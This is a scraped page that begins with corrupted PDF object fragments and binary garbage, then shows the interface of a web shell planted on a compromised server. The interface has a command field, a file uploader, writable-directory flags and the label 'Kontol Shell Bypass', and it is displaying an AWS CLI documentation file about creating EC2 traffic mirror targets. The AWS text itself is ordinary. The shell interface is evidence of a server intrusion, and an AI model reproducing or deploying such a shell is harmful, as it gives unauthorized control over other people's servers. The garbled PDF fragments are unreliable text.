%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /proc/self/root/usr/share/doc/awscli/examples/ec2/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //proc/self/root/usr/share/doc/awscli/examples/ec2/create-traffic-mirror-target.rst
**To create a a Network Load Balancer Traffic Mirror target**

The following ``create-traffic-mirror-target`` example creates a  Network Load Balancer Traffic Mirror target. ::
    
    aws ec2 create-traffic-mirror-target \
        --description "Example Network Load Balancer Target" \
        --network-load-balancer-arn arn:aws:elasticloadbalancing:us-east-1:111122223333:loadbalancer/net/NLB/7cdec873EXAMPLE

Output::

    {
        "TrafficMirrorTarget": {
            "Type": "network-load-balancer",
            "Tags": [],
            "Description": "Example Network Load Balancer Target",
            "OwnerId": "111122223333",
            "NetworkLoadBalancerArn": "arn:aws:elasticloadbalancing:us-east-1:724145273726:loadbalancer/net/NLB/7cdec873EXAMPLE",
            "TrafficMirrorTargetId": "tmt-0dabe9b0a6EXAMPLE"
        },
        "ClientToken": "d5c090f5-8a0f-49c7-8281-72c796a21f72"
    }

**To create a network Traffic Mirror target**

The following ``create-traffic-mirror-target`` example creates a network interface Traffic Mirror target.

    aws ec2 create-traffic-mirror-target \
        --description "Network interface target" \
        --network-interface-id eni-eni-01f6f631eEXAMPLE

Output::

    {
        "ClientToken": "5289a345-0358-4e62-93d5-47ef3061d65e",
        "TrafficMirrorTarget": {
            "Description": "Network interface target",
            "NetworkInterfaceId": "eni-01f6f631eEXAMPLE",
            "TrafficMirrorTargetId": "tmt-02dcdbe2abEXAMPLE",
            "OwnerId": "111122223333",
            "Type": "network-interface",
            "Tags": []
        }
    }

For more information, see `Create a Traffic Mirror Target <https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-target.html>`__ in the *AWS Traffic Mirroring Guide*.

Kontol Shell Bypass